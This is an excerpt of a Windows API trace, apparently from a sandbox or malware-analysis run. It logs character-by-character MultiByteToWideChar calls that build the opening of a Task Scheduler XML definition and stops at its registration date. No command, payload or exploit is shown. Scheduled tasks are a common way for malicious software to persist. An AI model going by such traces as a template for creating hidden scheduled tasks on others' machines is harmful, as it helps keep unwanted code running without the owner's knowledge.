[0216.209] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="1", cbMultiByte=1, lpWideCharStr=0x369db0c, cchWideChar=1 | out: lpWideCharStr="1") returned 1
[0216.209] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="6", cbMultiByte=1, lpWideCharStr=0x369db0e, cchWideChar=1 | out: lpWideCharStr="6\槛∃) returned 1
[0216.209] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\"", cbMultiByte=1, lpWideCharStr=0x369db10, cchWideChar=1 | out: lpWideCharStr="\"ͩ") returned 1
[0216.209] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="?", cbMultiByte=1, lpWideCharStr=0x369db12, cchWideChar=1 | out: lpWideCharStr="?") returned 1
[0216.209] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=">", cbMultiByte=1, lpWideCharStr=0x369db14, cchWideChar=1 | out: lpWideCharStr=">") returned 1
[0216.209] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\r", cbMultiByte=1, lpWideCharStr=0x369db16, cchWideChar=1 | out: lpWideCharStr="\r") returned 1
[0216.209] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\n", cbMultiByte=1, lpWideCharStr=0x369db18, cchWideChar=1 | out: lpWideCharStr="\n") returned 1
[0216.209] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="<", cbMultiByte=1, lpWideCharStr=0x369db1a, cchWideChar=1 | out: lpWideCharStr="<") returned 1
[0216.209] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="T", cbMultiByte=1, lpWideCharStr=0x369db1c, cchWideChar=1 | out: lpWideCharStr="T") returned 1
[0216.210] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="a", cbMultiByte=1, lpWideCharStr=0x369db1e, cchWideChar=1 | out: lpWideCharStr="a") returned 1
[0216.210] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x369db20, cchWideChar=1 | out: lpWideCharStr="s") returned 1
[0216.210] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="k", cbMultiByte=1, lpWideCharStr=0x369db22, cchWideChar=1 | out: lpWideCharStr="k") returned 1
[0216.210] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x369db24, cchWideChar=1 | out: lpWideCharStr=" ") returned 1
[0216.210] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="v", cbMultiByte=1, lpWideCharStr=0x369db26, cchWideChar=1 | out: lpWideCharStr="v\槛∃) returned 1
[0216.210] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x369db28, cchWideChar=1 | out: lpWideCharStr="eͩ") returned 1
[0216.210] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="r", cbMultiByte=1, lpWideCharStr=0x369db2a, cchWideChar=1 | out: lpWideCharStr="r") returned 1
[0216.210] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x369db2c, cchWideChar=1 | out: lpWideCharStr="s") returned 1
[0216.210] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="i", cbMultiByte=1, lpWideCharStr=0x369db2e, cchWideChar=1 | out: lpWideCharStr="i\槛∃) returned 1
[0216.210] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x369db30, cchWideChar=1 | out: lpWideCharStr="oͩ") returned 1
[0216.210] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x369db32, cchWideChar=1 | out: lpWideCharStr="n") returned 1
[0216.210] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="=", cbMultiByte=1, lpWideCharStr=0x369db34, cchWideChar=1 | out: lpWideCharStr="=") returned 1
[0216.210] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\"", cbMultiByte=1, lpWideCharStr=0x369db36, cchWideChar=1 | out: lpWideCharStr="\"") returned 1
[0216.210] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="1", cbMultiByte=1, lpWideCharStr=0x369db38, cchWideChar=1 | out: lpWideCharStr="1") returned 1
[0216.211] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=".", cbMultiByte=1, lpWideCharStr=0x369db3a, cchWideChar=1 | out: lpWideCharStr=".") returned 1
[0216.211] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="2", cbMultiByte=1, lpWideCharStr=0x369db3c, cchWideChar=1 | out: lpWideCharStr="2") returned 1
[0216.211] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\"", cbMultiByte=1, lpWideCharStr=0x369db3e, cchWideChar=1 | out: lpWideCharStr="\"") returned 1
[0216.211] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x369db40, cchWideChar=1 | out: lpWideCharStr=" ") returned 1
[0216.211] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="x", cbMultiByte=1, lpWideCharStr=0x369db42, cchWideChar=1 | out: lpWideCharStr="x") returned 1
[0216.211] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="m", cbMultiByte=1, lpWideCharStr=0x369db44, cchWideChar=1 | out: lpWideCharStr="m") returned 1
[0216.211] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x369db46, cchWideChar=1 | out: lpWideCharStr="l\槛∃) returned 1
[0216.211] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x369db48, cchWideChar=1 | out: lpWideCharStr="nͩ") returned 1
[0216.211] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x369db4a, cchWideChar=1 | out: lpWideCharStr="s") returned 1
[0216.211] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="=", cbMultiByte=1, lpWideCharStr=0x369db4c, cchWideChar=1 | out: lpWideCharStr="=") returned 1
[0216.211] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\"", cbMultiByte=1, lpWideCharStr=0x369db4e, cchWideChar=1 | out: lpWideCharStr="\"\槛∃) returned 1
[0216.211] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0x369db50, cchWideChar=1 | out: lpWideCharStr="hͩ") returned 1
[0216.211] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x369db52, cchWideChar=1 | out: lpWideCharStr="t") returned 1
[0216.211] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x369db54, cchWideChar=1 | out: lpWideCharStr="t") returned 1
[0216.212] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="p", cbMultiByte=1, lpWideCharStr=0x369db56, cchWideChar=1 | out: lpWideCharStr="p") returned 1
[0216.212] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=":", cbMultiByte=1, lpWideCharStr=0x369db58, cchWideChar=1 | out: lpWideCharStr=":") returned 1
[0216.212] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="/", cbMultiByte=1, lpWideCharStr=0x369db5a, cchWideChar=1 | out: lpWideCharStr="/") returned 1
[0216.212] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="/", cbMultiByte=1, lpWideCharStr=0x369db5c, cchWideChar=1 | out: lpWideCharStr="/") returned 1
[0216.212] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x369db5e, cchWideChar=1 | out: lpWideCharStr="s") returned 1
[0216.212] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="c", cbMultiByte=1, lpWideCharStr=0x369db60, cchWideChar=1 | out: lpWideCharStr="c") returned 1
[0216.212] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0x369db62, cchWideChar=1 | out: lpWideCharStr="h") returned 1
[0216.212] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x369db64, cchWideChar=1 | out: lpWideCharStr="e") returned 1
[0216.212] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="m", cbMultiByte=1, lpWideCharStr=0x369db66, cchWideChar=1 | out: lpWideCharStr="m\槛∃) returned 1
[0216.212] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="a", cbMultiByte=1, lpWideCharStr=0x369db68, cchWideChar=1 | out: lpWideCharStr="aͩ") returned 1
[0216.212] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x369db6a, cchWideChar=1 | out: lpWideCharStr="s") returned 1
[0216.212] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=".", cbMultiByte=1, lpWideCharStr=0x369db6c, cchWideChar=1 | out: lpWideCharStr=".") returned 1
[0216.212] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="m", cbMultiByte=1, lpWideCharStr=0x369db6e, cchWideChar=1 | out: lpWideCharStr="m\槛∃) returned 1
[0216.213] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="i", cbMultiByte=1, lpWideCharStr=0x369db70, cchWideChar=1 | out: lpWideCharStr="iͩ") returned 1
[0216.213] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="c", cbMultiByte=1, lpWideCharStr=0x369db72, cchWideChar=1 | out: lpWideCharStr="c") returned 1
[0216.213] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="r", cbMultiByte=1, lpWideCharStr=0x369db74, cchWideChar=1 | out: lpWideCharStr="r") returned 1
[0216.213] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x369db76, cchWideChar=1 | out: lpWideCharStr="o") returned 1
[0216.213] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x369db78, cchWideChar=1 | out: lpWideCharStr="s") returned 1
[0216.213] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x369db7a, cchWideChar=1 | out: lpWideCharStr="o") returned 1
[0216.213] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0x369db7c, cchWideChar=1 | out: lpWideCharStr="f") returned 1
[0216.213] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x369db7e, cchWideChar=1 | out: lpWideCharStr="t") returned 1
[0216.213] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=".", cbMultiByte=1, lpWideCharStr=0x369db80, cchWideChar=1 | out: lpWideCharStr=".") returned 1
[0216.213] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="c", cbMultiByte=1, lpWideCharStr=0x369db82, cchWideChar=1 | out: lpWideCharStr="c") returned 1
[0216.213] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x369db84, cchWideChar=1 | out: lpWideCharStr="o") returned 1
[0216.213] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="m", cbMultiByte=1, lpWideCharStr=0x369db86, cchWideChar=1 | out: lpWideCharStr="m\槛∃) returned 1
[0216.213] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="/", cbMultiByte=1, lpWideCharStr=0x369db88, cchWideChar=1 | out: lpWideCharStr="/ͩ") returned 1
[0216.213] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x369db8a, cchWideChar=1 | out: lpWideCharStr="w") returned 1
[0216.214] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="i", cbMultiByte=1, lpWideCharStr=0x369db8c, cchWideChar=1 | out: lpWideCharStr="i") returned 1
[0216.214] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x369db8e, cchWideChar=1 | out: lpWideCharStr="n\槛∃) returned 1
[0216.214] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x369db90, cchWideChar=1 | out: lpWideCharStr="dͩ") returned 1
[0216.214] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x369db92, cchWideChar=1 | out: lpWideCharStr="o") returned 1
[0216.214] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x369db94, cchWideChar=1 | out: lpWideCharStr="w") returned 1
[0216.214] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x369db96, cchWideChar=1 | out: lpWideCharStr="s") returned 1
[0216.214] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="/", cbMultiByte=1, lpWideCharStr=0x369db98, cchWideChar=1 | out: lpWideCharStr="/") returned 1
[0216.214] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="2", cbMultiByte=1, lpWideCharStr=0x369db9a, cchWideChar=1 | out: lpWideCharStr="2") returned 1
[0216.214] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x369db9c, cchWideChar=1 | out: lpWideCharStr="0") returned 1
[0216.214] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x369db9e, cchWideChar=1 | out: lpWideCharStr="0") returned 1
[0216.214] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="4", cbMultiByte=1, lpWideCharStr=0x369dba0, cchWideChar=1 | out: lpWideCharStr="4") returned 1
[0216.214] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="/", cbMultiByte=1, lpWideCharStr=0x369dba2, cchWideChar=1 | out: lpWideCharStr="/") returned 1
[0216.214] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x369dba4, cchWideChar=1 | out: lpWideCharStr="0") returned 1
[0216.214] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="2", cbMultiByte=1, lpWideCharStr=0x369dba6, cchWideChar=1 | out: lpWideCharStr="2\槛∃) returned 1
[0216.215] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="/", cbMultiByte=1, lpWideCharStr=0x369dba8, cchWideChar=1 | out: lpWideCharStr="/ͩ") returned 1
[0216.215] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="m", cbMultiByte=1, lpWideCharStr=0x369dbaa, cchWideChar=1 | out: lpWideCharStr="m") returned 1
[0216.215] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="i", cbMultiByte=1, lpWideCharStr=0x369dbac, cchWideChar=1 | out: lpWideCharStr="i") returned 1
[0216.215] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x369dbae, cchWideChar=1 | out: lpWideCharStr="t\槛∃) returned 1
[0216.215] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="/", cbMultiByte=1, lpWideCharStr=0x369dbb0, cchWideChar=1 | out: lpWideCharStr="/ͩ") returned 1
[0216.215] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x369dbb2, cchWideChar=1 | out: lpWideCharStr="t") returned 1
[0216.215] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="a", cbMultiByte=1, lpWideCharStr=0x369dbb4, cchWideChar=1 | out: lpWideCharStr="a") returned 1
[0216.215] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x369dbb6, cchWideChar=1 | out: lpWideCharStr="s") returned 1
[0216.215] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="k", cbMultiByte=1, lpWideCharStr=0x369dbb8, cchWideChar=1 | out: lpWideCharStr="k") returned 1
[0216.215] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\"", cbMultiByte=1, lpWideCharStr=0x369dbba, cchWideChar=1 | out: lpWideCharStr="\"") returned 1
[0216.215] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=">", cbMultiByte=1, lpWideCharStr=0x369dbbc, cchWideChar=1 | out: lpWideCharStr=">") returned 1
[0216.215] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\r", cbMultiByte=1, lpWideCharStr=0x369dbbe, cchWideChar=1 | out: lpWideCharStr="\r") returned 1
[0216.215] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\n", cbMultiByte=1, lpWideCharStr=0x369dbc0, cchWideChar=1 | out: lpWideCharStr="\n") returned 1
[0216.215] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x369dbc2, cchWideChar=1 | out: lpWideCharStr=" ") returned 1
[0216.216] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x369dbc4, cchWideChar=1 | out: lpWideCharStr=" ") returned 1
[0216.216] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="<", cbMultiByte=1, lpWideCharStr=0x369dbc6, cchWideChar=1 | out: lpWideCharStr="<\槛∃) returned 1
[0216.216] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="R", cbMultiByte=1, lpWideCharStr=0x369dbc8, cchWideChar=1 | out: lpWideCharStr="Rͩ") returned 1
[0216.216] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x369dbca, cchWideChar=1 | out: lpWideCharStr="e") returned 1
[0216.216] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="g", cbMultiByte=1, lpWideCharStr=0x369dbcc, cchWideChar=1 | out: lpWideCharStr="g") returned 1
[0216.216] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="i", cbMultiByte=1, lpWideCharStr=0x369dbce, cchWideChar=1 | out: lpWideCharStr="i\槛∃) returned 1
[0216.216] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x369dbd0, cchWideChar=1 | out: lpWideCharStr="sͩ") returned 1
[0216.216] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x369dbd2, cchWideChar=1 | out: lpWideCharStr="t") returned 1
[0216.216] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="r", cbMultiByte=1, lpWideCharStr=0x369dbd4, cchWideChar=1 | out: lpWideCharStr="r") returned 1
[0216.216] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="a", cbMultiByte=1, lpWideCharStr=0x369dbd6, cchWideChar=1 | out: lpWideCharStr="a") returned 1
[0216.216] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x369dbd8, cchWideChar=1 | out: lpWideCharStr="t") returned 1
[0216.216] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="i", cbMultiByte=1, lpWideCharStr=0x369dbda, cchWideChar=1 | out: lpWideCharStr="i") returned 1
[0216.216] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x369dbdc, cchWideChar=1 | out: lpWideCharStr="o") returned 1
[0216.217] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x369dbde, cchWideChar=1 | out: lpWideCharStr="n") returned 1
[0216.217] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="I", cbMultiByte=1, lpWideCharStr=0x369dbe0, cchWideChar=1 | out: lpWideCharStr="I") returned 1
[0216.217] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x369dbe2, cchWideChar=1 | out: lpWideCharStr="n") returned 1
[0216.217] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0x369dbe4, cchWideChar=1 | out: lpWideCharStr="f") returned 1
[0216.217] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x369dbe6, cchWideChar=1 | out: lpWideCharStr="o\槛∃) returned 1
[0216.217] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=">", cbMultiByte=1, lpWideCharStr=0x369dbe8, cchWideChar=1 | out: lpWideCharStr=">ͩ") returned 1
[0216.217] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\r", cbMultiByte=1, lpWideCharStr=0x369dbea, cchWideChar=1 | out: lpWideCharStr="\r") returned 1
[0216.217] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\n", cbMultiByte=1, lpWideCharStr=0x369dbec, cchWideChar=1 | out: lpWideCharStr="\n") returned 1
[0216.217] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x369dbee, cchWideChar=1 | out: lpWideCharStr=" \槛∃) returned 1
[0216.217] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x369dbf0, cchWideChar=1 | out: lpWideCharStr=" ͩ") returned 1
[0216.217] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x369dbf2, cchWideChar=1 | out: lpWideCharStr=" ") returned 1
[0216.217] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x369dbf4, cchWideChar=1 | out: lpWideCharStr=" ") returned 1
[0216.217] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="<", cbMultiByte=1, lpWideCharStr=0x369dbf6, cchWideChar=1 | out: lpWideCharStr="<") returned 1
[0216.217] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="D", cbMultiByte=1, lpWideCharStr=0x369dbf8, cchWideChar=1 | out: lpWideCharStr="D") returned 1
[0216.218] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="a", cbMultiByte=1, lpWideCharStr=0x369dbfa, cchWideChar=1 | out: lpWideCharStr="a") returned 1
[0216.218] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x369dbfc, cchWideChar=1 | out: lpWideCharStr="t") returned 1
[0216.218] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x369dbfe, cchWideChar=1 | out: lpWideCharStr="e") returned 1
[0216.218] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=">", cbMultiByte=1, lpWideCharStr=0x369dc00, cchWideChar=1 | out: lpWideCharStr=">") returned 1
[0216.218] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="2", cbMultiByte=1, lpWideCharStr=0x369dc02, cchWideChar=1 | out: lpWideCharStr="2") returned 1
[0216.219] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x369dc04, cchWideChar=1 | out: lpWideCharStr="0") returned 1
[0216.219] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="2", cbMultiByte=1, lpWideCharStr=0x369dc06, cchWideChar=1 | out: lpWideCharStr="2\槜∃) returned 1
[0216.219] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="4", cbMultiByte=1, lpWideCharStr=0x369dc08, cchWideChar=1 | out: lpWideCharStr="4ͩ") returned 1
[0216.219] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x369dc0a, cchWideChar=1 | out: lpWideCharStr="-") returned 1
[0216.219] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x369dc0c, cchWideChar=1 | out: lpWideCharStr="0") returned 1
[0216.219] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="1", cbMultiByte=1, lpWideCharStr=0x369dc0e, cchWideChar=1 | out: lpWideCharStr="1\槜∃) returned 1
[0216.219] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x369dc10, cchWideChar=1 | out: lpWideCharStr="-ͩ") returned 1
[0216.219] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x369dc12, cchWideChar=1 | out: lpWideCharStr="0") returned 1
[0216.219] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="2", cbMultiByte=1, lpWideCharStr=0x369dc14, cchWideChar=1 | out: lpWideCharStr="2") returned 1
[0216.219] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="T", cbMultiByte=1, lpWideCharStr=0x369dc16, cchWideChar=1 | out: lpWideCharStr="T") returned 1
[0216.219] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="2", cbMultiByte=1, lpWideCharStr=0x369dc18, cchWideChar=1 | out: lpWideCharStr="2") returned 1
[0216.219] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="1", cbMultiByte=1, lpWideCharStr=0x369dc1a, cchWideChar=1 | out: lpWideCharStr="1") returned 1
[0216.220] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=":", cbMultiByte=1, lpWideCharStr=0x369dc1c, cchWideChar=1 | out: lpWideCharStr=":") returned 1
[0216.220] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x369dc1e, cchWideChar=1 | out: lpWideCharStr="0") returned 1
[0216.220] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="8", cbMultiByte=1, lpWideCharStr=0x369dc20, cchWideChar=1 | out: lpWideCharStr="8") returned 1
[0216.220] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=":", cbMultiByte=1, lpWideCharStr=0x369dc22, cchWideChar=1 | out: lpWideCharStr=":") returned 1
[0216.220] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="2", cbMultiByte=1, lpWideCharStr=0x369dc24, cchWideChar=1 | out: lpWideCharStr="2") returned 1
[0216.220] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="2", cbMultiByte=1, lpWideCharStr=0x369dc26, cchWideChar=1 | out: lpWideCharStr="2\槜∃) returned 1
